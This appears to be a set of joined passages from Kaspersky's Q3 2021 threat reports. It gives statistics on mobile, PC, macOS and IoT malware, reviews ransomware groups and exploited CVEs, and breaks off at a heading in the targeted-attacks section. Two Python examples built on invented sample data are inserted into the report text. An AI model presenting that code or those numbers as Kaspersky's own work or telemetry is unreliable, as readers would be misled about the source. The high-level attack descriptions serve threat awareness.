The newcomer Trojan-SMS.AndroidOS.Fakeapp.b came eleventh (3.35%). This mobile malware can text and call preset numbers, show ads, and conceal its icon. Most users attacked by the Trojan are from Russia.

Trojan.AndroidOS.MobOk.ad (3.13%) that signs users up to paid services dropped into twelfth.

The adware downloader Trojan-Downloader.AndroidOS.Agent.kx (2.21%) rose to fourteenth.

Exploit.AndroidOS.Lotoor.be (1.66%), an exploit used for elevating privileges on the device to superuser level, came eighteenth. Members of this family often come bundled with other widespread malware like Triada and Necro.

Trojan.AndroidOS.Fakeapp.dn (1.64%), another new arrival, takes the nineteenth place. This is a scam app exploiting the theme of social payments: it opens fake pages prompting users to provide their personal data and pay a fee to receive money.

The Top 20 is rounded out by Trojan-SMS.AndroidOS.Prizmes.a (1.53%), which is preinstalled on some Android devices under the guise of Sound Recorder. The Trojan texts preset numbers reporting the events taking place on the device (e.g., smartphone power on).

Geography of mobile threats

Map of infection attempts by mobile malware, Q3 2021

Top 10 countries by share of users attacked by mobile malware

    Country*        %**
 1  Iran            20.14
 2  Saudi Arabia    17.84
 3  China           17.07
 4  Algeria         16.73
 5  India           15.33
 6  Malaysia        13.63
 7  Ecuador         11.52
 8  Brazil          11.15
 9  Bangladesh      10.81
10  Nigeria         10.81

* Excluded from the rankings are countries with relatively few users of Kaspersky mobile security solutions (under 10,000).
** Share of unique users attacked as a percentage of all users of Kaspersky mobile security solutions in the country.

In Q3 2021, the infected systems percentage ranking is led by the same countries as in Q2; the most popular threats in these countries are likewise the same. First place went to Iran (20.14%), its prevailing threat represented by annoying adware modules of the families AdWare.AndroidOS.Notifyer and AdWare.AndroidOS.Fyben.

In Saudi Arabia, which came second with 17.84%, AdWare.AndroidOS.HiddenAd and AdWare.AndroidOS.FakeAdBlocker adware were the most common issue.

China (17.07%) came third with Trojan.AndroidOS.Najin.a as its most widely spread Trojan.

Mobile banking Trojans

We detected 12,097 mobile banking Trojan installers during the reporting period — 12,507 less from Q2 and 22,813 less year on year.

The largest contributors to these figures were the families Trojan-Banker.AndroidOS.Agent (46.72% of all banking Trojans detected), Trojan-Banker.AndroidOS.Bian (16.18%) and Trojan-Banker.AndroidOS.Anubis (8.20%).

Number of installation packages for mobile banking Trojans detected by Kaspersky, Q3 2020 – Q3 2021

Ten most common mobile bankers

    Verdict                                %*
 1  Trojan-Banker.AndroidOS.Anubis.t       16.77
 2  Trojan-Banker.AndroidOS.Svpeng.q       11.17
 3  Trojan-Banker.AndroidOS.Bian.f          9.08
 4  Trojan-Banker.AndroidOS.Agent.eq        6.83
 5  Trojan-Banker.AndroidOS.Asacub.ce       6.22
 6  Trojan-Banker.AndroidOS.Agent.ep        5.17
 7  Trojan-Banker.AndroidOS.Hqwar.t         3.53
 8  Trojan-Banker.AndroidOS.Agent.cf        3.05
 9  Trojan-Banker.AndroidOS.Bian.h          2.83
10  Trojan-Banker.AndroidOS.Svpeng.t        2.81

* Unique users attacked by this malware as a percentage of all Kaspersky mobile security solution users who encountered banking threats.

In Q3 2021, first place in our top mobile bankers ranking was taken by the Anubis family’s Trojan-Banker.AndroidOS.Anubis.t (16.77%). In second (11.17%) and tenth (2.81%) are bankers of the Svpeng family. Bian family bankers are in third (9.08%) and ninth (2.83%).

Geography of mobile banking threats, Q3 2021

Top 10 countries by share of users attacked by mobile banking Trojans

    Country*       %**
 1  Spain          1.02
 2  Austria        0.44
 3  Croatia        0.43
 4  Germany        0.33
 5  Japan          0.26
 6  Turkey         0.22
 7  Portugal       0.20
 8  Norway         0.20
 9  China          0.18
10  Switzerland    0.14

* Excluded from the rankings are countries with relatively few users of Kaspersky mobile security solutions (under 10,000).
** Unique users attacked by mobile banking Trojans as a percentage of all Kaspersky mobile security solution users in the country.

Spain has the largest share of unique users attacked by mobile financial threats in Q3 2021 (1.02%). The prevalent banker detected in this country is Trojan-Banker.AndroidOS.Bian.h (33.55% of all banking Trojans detected). Austria (0.44%) is second with another Bian family representative — Trojan-Banker.AndroidOS.Bian.f (96.02%) — leading by a mile. Croatia (0.43%) is third with Bian.f (97.59%) as its most widely spread banker.

Mobile ransomware Trojans

In Q3 2021, we detected 6,157 installation packages for mobile ransomware Trojans — an increase of 2,534 from the previous quarter and 635 more than in Q3 2020.

Number of mobile ransomware installers detected by Kaspersky, Q3 2020 — Q3 2021

Top 10 most common mobile ransomware

    Verdict                                %*
 1  Trojan-Ransom.AndroidOS.Pigetrl.a      51.00
 2  Trojan-Ransom.AndroidOS.Rkor.ax        10.43
 3  Trojan-Ransom.AndroidOS.Rkor.bb         8.58
 4  Trojan-Ransom.AndroidOS.Rkor.az         5.31
 5  Trojan-Ransom.AndroidOS.Rkor.bc         4.64
 6  Trojan-Ransom.AndroidOS.Rkor.ay         4.49
 7  Trojan-Ransom.AndroidOS.Small.as        3.92
 8  Trojan-Ransom.AndroidOS.Rkor.ba         2.30
 9  Trojan-Ransom.AndroidOS.Rkor.au         1.72
10  Trojan-Ransom.AndroidOS.Rkor.aw         1.41

* Unique users attacked by the malware as a percentage of all Kaspersky mobile security solution users attacked by ransomware Trojans.

As in Q2, the ransomware Trojan ranking is led by Trojan-Ransom.AndroidOS.Pigetrl.a, with 51% of all attacked users. Most of its attacks (92%) targeted users in Russia.

Geography of mobile ransomware Trojans, Q3 2021

Top 10 countries by share of users attacked by mobile ransomware Trojans

#    Country*        %**
1    Kazakhstan      0.57
2    Sweden          0.22
3    Kyrgyzstan      0.21
4    Morocco         0.06
5    China           0.06
6    Saudi Arabia    0.05
7    Uzbekistan      0.04
8    Algeria         0.04
9    Pakistan        0.02
10   Egypt           0.02

* Excluded from the rating are countries with relatively few users of Kaspersky mobile security solutions (under 10,000).
** Unique users attacked by ransomware Trojans as a percentage of all Kaspersky mobile security solution users in the country.

Countries leading by number of users attacked by mobile ransomware Trojans are the same as in Q2: Kazakhstan (0.57%), Sweden (0.22%) and Kyrgyzstan (0.21%). In all three the Trojan-Ransom.AndroidOS.Rkor family Trojans were the most common threat.

IT threat evolution in Q3 2021. PC statistics

Kaspersky Securelist - 26 November 2021 - 13:00

These statistics are based on detection verdicts of Kaspersky products received from users who consented to providing statistical data.

Quarterly figures

According to Kaspersky Security Network, in Q3 2021:

  • Kaspersky solutions blocked 1,098,968,315 attacks from online resources across the globe.
  • Web Anti-Virus recognized 289,196,912 unique URLs as malicious.
  • Attempts to run malware for stealing money from online bank accounts were stopped on the computers of 104,257 unique users.
  • Ransomware attacks were defeated on the computers of 108,323 unique users.
  • Our File Anti-Virus detected 62,577,326 unique malicious and potentially unwanted objects.
Financial threats

Financial threat statistics

In Q3 2021, Kaspersky solutions blocked the launch of at least one piece of banking malware on the computers of 104,257 unique users.

Number of unique users attacked by financial malware, Q3 2021

Geography of financial malware attacks

To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products who faced this threat during the reporting period as a percentage of all users of our products in that country.

Geography of financial malware attacks, Q3 2021

Top 10 countries by share of attacked users

#    Country*        %**
1    Turkmenistan    5.4
2    Tajikistan      3.7
3    Afghanistan     3.5
4    Uzbekistan      3.0
5    Yemen           1.9
6    Kazakhstan      1.6
7    Paraguay        1.6
8    Sudan           1.6
9    Zimbabwe        1.4
10   Belarus         1.1

* Excluded are countries with relatively few Kaspersky product users (under 10,000).
** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country.

Top 10 banking malware families

#    Name              Verdict                                   %*
1    Zbot              Trojan.Win32.Zbot                         17.7
2    SpyEye            Trojan-Spy.Win32.SpyEye                   17.5
3    CliptoShuffler    Trojan-Banker.Win32.CliptoShuffler         9.6
4    Trickster         Trojan.Win32.Trickster                     4.5
5    RTM               Trojan-Banker.Win32.RTM                    3.6
6    Nimnul            Virus.Win32.Nimnul                         3.0
7    Gozi              Trojan-Banker.Win32.Gozi                   2.7
8    Danabot           Trojan-Banker.Win32.Danabot                2.4
9    Tinba             Trojan-Banker.Win32.Tinba                  1.5
10   Cridex            Backdoor.Win32.Cridex                      1.3

* Unique users who encountered this malware family as a percentage of all users attacked by financial malware.

In Q3, the family ZeuS/Zbot (17.7%), as usual, became the most widespread family of bankers. Next came the SpyEye (17.5%) family, whose share doubled from 8.8% in the previous quarter. The Top 3 was rounded out by the CliptoShuffler family (9.6%) — one position and just 0.3 p.p. down. The families Trojan-Banker.Win32.Gozi (2.7%) and Trojan-Banker.Win32.Tinba (1.5%) have made it back into the Top 10 in Q3 — seventh and ninth places, respectively.

Ransomware programs

Quarterly trends and highlights

Attack on Kaseya and the REvil story

In early July, the REvil/Sodinokibi group attacked the Kaseya VSA remote administration software, compromising several managed service providers (MSPs) that used it. Through this supply-chain attack, the attackers were able to infect over one thousand of the compromised MSPs’ client businesses. REvil’s original $70 million ransom demand for decrypting all the users hit by the attack was soon lowered to 50 million.

Following this massive attack, law enforcement agencies stepped up their attention to REvil, so by mid-July the gang turned off their Trojan infrastructure, suspended new infections and dropped out of sight. Meanwhile, Kaseya got a universal decryptor for all those affected by the attack. According to Kaseya, it “did not pay a ransom — either directly or indirectly through a third party”. Later it emerged that the company got the decryptor and the key from the FBI.

But already in the first half of September, REvil was up and running again. According to the hacking forum XSS, the group’s former public representative known as UNKN “disappeared”, and the malware developers, failing to find him, waited awhile and restored the Trojan infrastructure from backups.

The arrival of BlackMatter: DarkSide restored?

As we already wrote in our Q2 report, the group DarkSide folded its operations after their “too high-profile” attack on Colonial Pipeline. And now there is a “new” arrival known as BlackMatter, which, as its members claim, represents the “best” of DarkSide, REvil and LockBit.

From our analysis of the BlackMatter Trojan’s executable we conclude that most likely it was built using DarkSide’s source codes.

Q3 closures

  • Europol and the Ukrainian police have arrested two members of an unnamed ransomware gang. The only detail made known is that the ransom demands amounted to €5 to €70 million.
  • Following its attack on Washington DC’s Metropolitan Police Department, the group Babuk folded (or just suspended) its operations and published an archive containing the Trojan’s source code, build tools and keys for some of the victims.
  • At the end of August, Ragnarok (not to be confused with RagnarLocker) suddenly called it a day, deleted all their victims’ info from their portal and published the master key for decryption. The group gave no reasons for this course of action.

Exploitation of vulnerabilities and new attack methods

  • The group HelloKitty distributed its ransomware by exploiting the vulnerability CVE-2019-7481 in SonicWall gateways.
  • Magniber and Vice Society penetrated target systems by exploiting vulnerabilities from the PrintNightmare family (CVE-2021-1675, CVE-2021-34527, CVE-2021-36958).
  • The group LockFile exploited ProxyShell vulnerabilities (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) to penetrate the victim’s network; for lateral movement they relied on the new PetitPotam attack to gain control of the domain controller.
  • The group Conti also used ProxyShell exploits in its attacks.

Number of new ransomware modifications

In Q3 2021, we detected 11 new ransomware families and 2,486 new modifications of this malware type.

Number of new ransomware modifications, Q3 2020 — Q3 2021

Number of users attacked by ransomware Trojans

In Q3 2021, Kaspersky products and technologies protected 108,323 users from ransomware attacks.

Number of unique users attacked by ransomware Trojans, Q3 2021

Geography of ransomware attacks

Geography of attacks by ransomware Trojans, Q3 2021

Top 10 countries attacked by ransomware Trojans

#    Country*       %**
1    Bangladesh     1.98
2    Uzbekistan     0.59
3    Bolivia        0.55
4    Pakistan       0.52
5    Myanmar        0.51
6    China          0.51
7    Mozambique     0.51
8    Nepal          0.48
9    Indonesia      0.47
10   Egypt          0.45

* Excluded are countries with relatively few Kaspersky users (under 50,000).
** Unique users attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country.

Top 10 most common families of ransomware Trojans

#    Name                  Verdict                                                    %*
1    Stop/Djvu             Trojan-Ransom.Win32.Stop                                   27.67%
2    (generic verdict)     Trojan-Ransom.Win32.Crypren                                17.37%
3    WannaCry              Trojan-Ransom.Win32.Wanna                                  11.84%
4    (generic verdict)     Trojan-Ransom.Win32.Gen                                     7.78%
5    (generic verdict)     Trojan-Ransom.Win32.Encoder                                 5.58%
6    (generic verdict)     Trojan-Ransom.Win32.Phny                                    5.57%
7    PolyRansom/VirLock    Virus.Win32.Polyransom / Trojan-Ransom.Win32.PolyRansom     2.65%
8    (generic verdict)     Trojan-Ransom.Win32.Agent                                   2.04%
9    (generic verdict)     Trojan-Ransom.MSIL.Encoder                                  1.07%
10   (generic verdict)     Trojan-Ransom.Win32.Crypmod                                 1.04%

* Unique Kaspersky users attacked by this family of ransomware Trojans as a percentage of all users attacked by such malware.

Miners

Number of new miner modifications

In Q3 2021, Kaspersky solutions detected 46,097 new modifications of miners.

Number of new miner modifications, Q3 2021

Number of users attacked by miners

In Q3, we detected attacks using miners on the computers of 322,131 unique users of Kaspersky products worldwide. And while during Q2 the number of attacked users gradually decreased, the trend was reversed in July and August 2021. With slightly over 140,000 unique users attacked by miners in July, the number of potential victims almost reached 150,000 in September.

Number of unique users attacked by miners, Q3 2021

Geography of miner attacks

Geography of miner attacks, Q3 2021

Top 10 countries attacked by miners

#    Country*       %**
1    Ethiopia       2.41
2    Rwanda         2.26
3    Myanmar        2.22
4    Uzbekistan     1.61
5    Ecuador        1.47
6    Pakistan       1.43
7    Tanzania       1.40
8    Mozambique     1.34
9    Kazakhstan     1.34
10   Azerbaijan     1.27

* Excluded are countries with relatively few users of Kaspersky products (under 50,000).
** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country.

Vulnerable applications used by cybercriminals during cyberattacks

Quarter highlights

Much clamor was caused in Q3 by a whole new family of vulnerabilities in the Microsoft Windows printing subsystem, already known to the media as PrintNightmare: CVE-2021-1640, CVE-2021-26878, CVE-2021-1675, CVE-2021-34527, CVE-2021-36936, CVE-2021-36947, CVE-2021-34483. All of these vulnerabilities allow local escalation of privileges or remote execution of commands with SYSTEM rights and, as they require next to nothing to exploit, they are often used by popular mass-infection tools. Fixing them requires several Microsoft patches.

The vulnerability known as PetitPotam proved no less troublesome. It allows an unprivileged user to take control of a Windows domain computer — or even a domain controller — provided the Active Directory certificate service is present and active.

In the newest OS, Windows 11, even before its official release, the vulnerability CVE-2021-36934 was detected and dubbed HiveNightmare/SeriousSam. It allows an unprivileged user to copy all the registry hives, including SAM, through the shadow copy mechanism, potentially exposing password hashes and other critical data.

In Q3, attackers greatly favored exploits targeting the vulnerabilities ProxyToken, ProxyShell and ProxyOracle (CVE-2021-31207, CVE-2021-34473, CVE-2021-31207, CVE-2021-33766, CVE-2021-31195, CVE-2021-31196). Exploited in combination, they give full control of mail servers running Microsoft Exchange Server. We have already covered similar vulnerabilities; for instance, they were used in the HAFNIUM attack, which also targeted Microsoft Exchange Server.

As before, server attacks relying on brute-forcing passwords to various network services, such as MS SQL, RDP, etc., stand out among the Q3 2021 network threats. Attacks using the EternalBlue, EternalRomance and similar exploits are as popular as ever. Among the new ones is a serious vulnerability enabling remote code execution when processing Object-Graph Navigation Language (OGNL) expressions in Atlassian Confluence Server (CVE-2021-26084), a product often used in corporate environments. Also, Pulse Connect Secure was found to contain the vulnerability CVE-2021-22937, which however requires the administrator password to be exploited.

Statistics

As before, exploits for Microsoft Office vulnerabilities are still leading the pack in Q3 2021 (60.68%). These are popular due to the large user base, most of whom still use older versions of the software, which makes the attackers’ job much easier. The share of Microsoft Office exploits increased by almost 5 p.p. from the previous quarter. Among other things, this was due to the new vulnerability CVE-2021-40444, which was discovered in the wild and instantly employed to compromise user machines. An attacker can exploit it through the standard functionality that allows Office documents to download templates, implemented with the help of special ActiveX components. The processed data is not properly validated during this operation, so arbitrary malicious code can be downloaded. As you are reading this, the relevant security update is already available.

The way individual Microsoft Office vulnerabilities are ranked by the number of detections does not change much with time: the first positions are still shared by CVE-2018-0802 and CVE-2017-8570, with another popular vulnerability CVE-2017-11882 not far behind. We already covered these many times — all the above-mentioned vulnerabilities execute commands on behalf of the user and infect the system.

Distribution of exploits used by cybercriminals, by type of attacked application, Q3 2021

The share of exploits for popular browsers fell by 3 p.p. from the previous reporting period to 25.57% in Q3. In the three months covered by the report, several vulnerabilities were discovered in the Google Chrome browser and its V8 script engine, some of them in the wild. Among these, the following JavaScript engine vulnerabilities stand out: CVE-2021-30563 (type confusion error corrupting heap memory), CVE-2021-30632 (out-of-bounds write in V8) and CVE-2021-30633 (use-after-free in IndexedDB). All of these can potentially allow remote code execution. It should be remembered, however, that for modern browsers a chain of several exploits is usually required to escape the sandbox and obtain broader privileges in the system. It should also be noted that because the Google Chromium codebase (in particular the Blink component and V8) is used in many browsers, any newly detected Google Chrome vulnerability automatically makes other browsers built on that open codebase vulnerable as well.

Third place is held by Google Android vulnerabilities (5.36%), 1 p.p. down from the previous period. They are followed by exploits for Adobe Flash (3.41%), whose share is gradually decreasing. The platform is no longer supported but is still favored by users, which is reflected in our statistics.

Our ranking is rounded out by vulnerabilities for Java (2.98%), its share also noticeably lower, and Adobe PDF (1.98%).

Attacks on macOS

We will remember Q3 2021 for two interesting revelations. The first is the use of malware code targeting macOS as part of the WildPressure campaign. The second is the detailed review of the previously unknown FinSpy implants for macOS.

Speaking of the most widespread threats detected by Kaspersky security solutions for macOS, most of our Top 20 ranking positions are occupied by various adware apps. Among the noteworthy ones is Monitor.OSX.HistGrabber.b (second place on the list) — this potentially unwanted software sends user browser history to its owners’ servers.

Top 20 threats for macOS

#    Verdict                              %*
1    AdWare.OSX.Pirrit.j                  13.22
2    Monitor.OSX.HistGrabber.b            11.19
3    AdWare.OSX.Pirrit.ac                 10.31
4    AdWare.OSX.Pirrit.o                   9.32
5    AdWare.OSX.Bnodlero.at                7.43
6    Trojan-Downloader.OSX.Shlayer.a       7.22
7    AdWare.OSX.Pirrit.gen                 6.41
8    AdWare.OSX.Cimpli.m                   6.29
9    AdWare.OSX.Bnodlero.bg                6.13
10   AdWare.OSX.Pirrit.ae                  5.96
11   AdWare.OSX.Agent.gen                  5.65
12   AdWare.OSX.Pirrit.aa                  5.39
13   Trojan-Downloader.OSX.Agent.h         4.49
14   AdWare.OSX.Bnodlero.ay                4.18
15   AdWare.OSX.Ketin.gen                  3.56
16   AdWare.OSX.Ketin.h                    3.46
17   Backdoor.OSX.Agent.z                  3.45
18   Trojan-Downloader.OSX.Lador.a         3.06
19   AdWare.OSX.Bnodlero.t                 2.80
20   AdWare.OSX.Bnodlero.ax                2.64

* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked.

Geography of threats for macOS

Geography of threats for macOS, Q3 2021

Top 10 countries by share of attacked users

#    Country*          %**
1    France            3.05
2    Spain             2.85
3    India             2.70
4    Mexico            2.59
5    Canada            2.52
6    Italy             2.42
7    United States     2.37
8    Australia         2.23
9    Brazil            2.21
10   United Kingdom    2.12

* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000).
** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country.

In Q3 2021, France took the lead with the greatest percentage of attacked users of Kaspersky security solutions (3.05%), the potentially unwanted software Monitor.OSX.HistGrabber being the prevalent threat there. Spain and India came in second and third, with Pirrit family adware as their prevalent threat.

IoT attacks

IoT threat statistics

In Q3 2021, most of the devices that attacked Kaspersky honeypots did so using the Telnet protocol. Just under a quarter of all devices attempted to brute-force our traps via SSH.

Telnet    76.55%
SSH       23.45%

Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q3 2021

The statistics for working sessions with Kaspersky honeypots show similar Telnet dominance.

Telnet    84.29%
SSH       15.71%

Distribution of cybercriminal working sessions with Kaspersky traps, Q3 2021
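The two distributions above differ because they count different things: one counts each attacking IP address once, the other counts every session, so a few sources that open many sessions pull the second figure toward their protocol. The following is an added example, not code from the report, that computes both metrics from a constructed honeypot session log. The log format, the field names and the decision to count a device once under each protocol it used are assumptions for the example.

```python
import re
from collections import Counter, defaultdict

# Constructed honeypot session log for this example (not Kaspersky telemetry):
# one line per completed session, with the protocol and the source address.
SAMPLE_LOG = """\
2021-07-01T00:00:01Z proto=telnet src=198.51.100.10 session=1
2021-07-01T00:00:02Z proto=telnet src=198.51.100.10 session=2
2021-07-01T00:00:03Z proto=telnet src=198.51.100.10 session=3
2021-07-01T00:00:04Z proto=telnet src=198.51.100.11 session=4
2021-07-01T00:00:05Z proto=ssh src=203.0.113.5 session=5
2021-07-01T00:00:06Z proto=ssh src=203.0.113.6 session=6
2021-07-01T00:00:07Z proto=ssh src=203.0.113.6 session=7
garbage line that must not crash the parser
"""

# Assumed log format; adapt the pattern to whatever your honeypot writes.
LINE_RE = re.compile(
    r"^\S+ proto=(?P<proto>\w+) src=(?P<src>\d+(?:\.\d+){3}) session=(?P<sid>\d+)$"
)


def parse_sessions(log_text):
    """Yield (protocol, source_ip, session_id) for each well-formed line;
    malformed lines are skipped rather than aborting the whole run."""
    for line in log_text.splitlines():
        match = LINE_RE.match(line)
        if match:
            yield match.group("proto"), match.group("src"), match.group("sid")


def protocol_shares(log_text):
    """Return two dicts: share of unique attacking IPs per protocol and share
    of sessions per protocol, both in percent rounded to two decimals.

    A device that used both protocols is counted once under each (assumption).
    """
    ips_by_proto = defaultdict(set)
    sessions_by_proto = Counter()
    for proto, src, _sid in parse_sessions(log_text):
        ips_by_proto[proto].add(src)
        sessions_by_proto[proto] += 1
    total_ips = sum(len(s) for s in ips_by_proto.values())
    total_sessions = sum(sessions_by_proto.values())
    by_ip = {p: round(100.0 * len(s) / total_ips, 2) for p, s in ips_by_proto.items()}
    by_session = {p: round(100.0 * n / total_sessions, 2)
                  for p, n in sessions_by_proto.items()}
    return by_ip, by_session


if __name__ == "__main__":
    ip_share, session_share = protocol_shares(SAMPLE_LOG)
    for proto in ip_share:
        print(f"{proto:7s} by unique IP: {ip_share[proto]:6.2f}%  "
              f"by session: {session_share[proto]:6.2f}%")
```

With the sample log, Telnet and SSH each account for half of the attacking addresses, but Telnet accounts for 57.14% of sessions because one Telnet source opened three of them; that is the same effect that separates the 76.55% and 84.29% figures in the report.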

Top 10 threats delivered to IoT devices via Telnet

#    Verdict                               %*
1    Backdoor.Linux.Mirai.b                39.48
2    Trojan-Downloader.Linux.NyaDrop.b     20.67
3    Backdoor.Linux.Agent.bc               10.00
4    Backdoor.Linux.Mirai.ba                8.65
5    Trojan-Downloader.Shell.Agent.p        3.50
6    Backdoor.Linux.Gafgyt.a                2.52
7    RiskTool.Linux.BitCoinMiner.b          1.69
8    Backdoor.Linux.Ssh.a                   1.23
9    Backdoor.Linux.Mirai.ad                1.20
10   HackTool.Linux.Sshbru.s                1.12

* Share of each threat delivered to infected devices as a result of a successful Telnet attack out of the total number of delivered threats.

Detailed IoT threat statistics are published in our Q3 2021 DDoS report: https://securelist.com/ddos-attacks-in-q3-2021/104796/#attacks-on-iot-honeypots

Attacks via web resources

The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious or infected web pages. Cybercriminals create such sites deliberately; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can also be infected.

Countries that serve as sources of web-based attacks: Top 10

The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites hosting malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks.

To determine the geographic source of web attacks, the GeoIP technique was used to match the domain name to the real IP address at which the domain is hosted.

In Q3 2021, Kaspersky solutions blocked 1,098,968,315 attacks launched from online resources located across the globe. Web Anti-Virus recognized 289,196,912 unique URLs as malicious.

Distribution of web-attack sources by country, Q3 2021

Countries where users faced the greatest risk of online infection

To assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.

This rating only includes attacks by malicious programs that fall under the Malware class; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.

#    Country*       % of attacked users**
1    Tunisia        27.15
2    Syria          17.19
3    Yemen          17.05
4    Nepal          15.27
5    Algeria        15.27
6    Macao          14.83
7    Belarus        14.50
8    Moldova        13.91
9    Madagascar     13.80
10   Serbia         13.48
11   Libya          13.13
12   Mauritania     13.06
13   Mongolia       13.06
14   India          12.89
15   Palestine      12.79
16   Sri Lanka      12.76
17   Ukraine        12.39
18   Estonia        11.61
19   Tajikistan     11.44
20   Qatar          11.14

* Excluded are countries with relatively few Kaspersky users (under 10,000).
** Unique users targeted by Malware-class attacks as a percentage of all unique users of Kaspersky products in the country.

These statistics are based on detection verdicts by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data.

On average during the quarter, 8.72% of computers of Internet users worldwide were subjected to at least one Malware-class web attack.

Geography of web-based malware attacks, Q3 2021

Local threats

In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. It takes into account malicious programs that were found directly on users’ computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.).

In Q3 2021, our File Anti-Virus detected 62,577,326 malicious and potentially unwanted objects.

Countries where users faced the highest risk of local infection

For each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.

Note that this rating only includes attacks by malicious programs that fall under the Malware class; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.

#    Country*        % of attacked users**
1    Turkmenistan    47.42
2    Yemen           44.27
3    Ethiopia        42.57
4    Tajikistan      42.51
5    Uzbekistan      40.41
6    South Sudan     40.15
7    Afghanistan     40.07
8    Cuba            38.20
9    Bangladesh      36.49
10   Myanmar         35.96
11   Venezuela       35.20
12   China           35.16
13   Syria           34.64
14   Madagascar      33.49
15   Rwanda          33.06
16   Sudan           33.01
17   Benin           32.68
18   Burundi         31.88
19   Laos            31.70
20   Cameroon        31.28

* Excluded are countries with relatively few Kaspersky users (under 10,000).
** Unique users on whose computers Malware-class local threats were blocked, as a percentage of all unique users of Kaspersky products in the country.

Geography of local infection attempts, Q3 2021

On average worldwide, Malware-class local threats were recorded on 15.14% of users’ computers at least once during the quarter. Russia scored 14.64% in this rating.
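Every per-country ranking in this report (financial malware, ransomware, miners, web and local threats) is built the same way: unique attacked users divided by all product users in the country, with small installed bases excluded so that a handful of detections cannot produce a misleading percentage. The following is an added example, not Kaspersky's code or data, that implements that computation over constructed sample telemetry; the population figures, country names and user identifiers are invented for the example.

```python
from collections import defaultdict

# Constructed sample telemetry (not Kaspersky data): the installed base per
# country and one record per detection. Several detections may hit the same
# user; the methodology counts each attacked user only once.
SAMPLE_POPULATION = {"Country A": 20000, "Country B": 50000, "Country C": 5000}
SAMPLE_DETECTIONS = (
    [("a%03d" % i, "Country A") for i in range(30)]
    + [("a000", "Country A")] * 5            # repeat detections on one user
    + [("b%03d" % i, "Country B") for i in range(50)]
    + [("c%03d" % i, "Country C") for i in range(100)]
)


def attacked_share(population, detections, min_users=10000, top=10):
    """Rank countries by the share of users attacked during the period.

    share = unique attacked users / all users in the country * 100.
    Countries with fewer than `min_users` users are excluded: with a tiny
    installed base, a few detections would yield an unstable, inflated share
    (Country C below would otherwise top the list at 2%).
    Returns [(rank, country, share)] sorted by share descending, then name.
    """
    attacked = defaultdict(set)
    for user_id, country in detections:
        attacked[country].add(user_id)

    rows = []
    for country, total in population.items():
        if total < min_users:
            continue
        share = 100.0 * len(attacked.get(country, ())) / total
        rows.append((country, round(share, 2)))

    rows.sort(key=lambda r: (-r[1], r[0]))
    return [(i + 1, c, s) for i, (c, s) in enumerate(rows[:top])]


if __name__ == "__main__":
    for rank, country, share in attacked_share(SAMPLE_POPULATION, SAMPLE_DETECTIONS):
        print(f"{rank:2d}  {country:10s}  {share:5.2f}%")
```

Lowering the threshold (for example `min_users=1000`) brings Country C back into the ranking at 2.00%, which illustrates why the report's footnotes state the exclusion limit next to every table.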

IT threat evolution Q3 2021

Kaspersky Securelist - 26 November 2021 - 13:00

Targeted attacks

WildPressure targets macOS

Last March, we reported a WildPressure campaign targeting industrial-related entities in the Middle East. While tracking this threat actor in spring 2021, we discovered a newer version. It contains the C++ Milum Trojan, a corresponding VBScript variant and a set of modules that include an orchestrator and three plugins. This confirms our previous assumption that there were more last-stagers besides the C++ ones.

Another language used by WildPressure is Python. The PyInstaller module for Windows contains a script named “Guard”. Interestingly, this malware was developed for both Windows and macOS. The coding style, overall design and C2 communication protocol are quite recognizable across all three programming languages used by the authors.

WildPressure used both virtual private servers (VPS) and compromised servers in its infrastructure, most of which were WordPress websites.

We have very limited visibility for the samples described in our report, but our telemetry suggests that the targets in this campaign were also from the oil and gas industry.

You can view our report on the new version here, together with a video presentation of our findings.

LuminousMoth: sweeping attacks for the chosen few

We recently uncovered a large-scale and highly active attack against targets in Southeast Asia by a threat actor that we call LuminousMoth. The campaign dates back to October last year and was still ongoing at the time we published our public report in July. Most of the early sightings were in Myanmar, but it seems the threat actor is now much more active in the Philippines. Targets include high-profile organizations: namely, government entities located both within those countries and abroad.

Most APT threats carefully select their targets and tailor the infection vectors, implants and payloads to the victims’ identities or environment. It’s not often we observe a large-scale attack by APT threat actors – they usually avoid such attacks because they are too ‘noisy’ and risk drawing attention to the campaign. LuminousMoth is an exception. We observed a high number of infections, although we think the campaign was aimed at a few targets of interest.

The attackers obtain initial access to a system by sending a spear-phishing email to the victim containing a Dropbox download link. The link leads to a RAR archive that masquerades as a Word document. The archive contains two malicious DLL libraries as well as two legitimate executables that side-load the DLL files. We found multiple archives like this with file names of government entities linked to Myanmar.

We also observed a second infection vector that comes into play after the first one has successfully finished. The malware tries to spread to other hosts on the network by infecting USB drives.

In addition to the malicious DLLs, the attackers also deployed a signed, but fake version of the popular application Zoom on some infected systems, enabling them to exfiltrate data.

The threat actor also deploys an additional tool that accesses a victim’s Gmail session by stealing cookies from the Chrome browser.

Infrastructure ties as well as shared TTPs allude to a possible connection between LuminousMoth and the HoneyMyte threat group, which has been seen targeting the same region using similar tools in the past.

Targeted attacks exploiting CVE-2021-40444

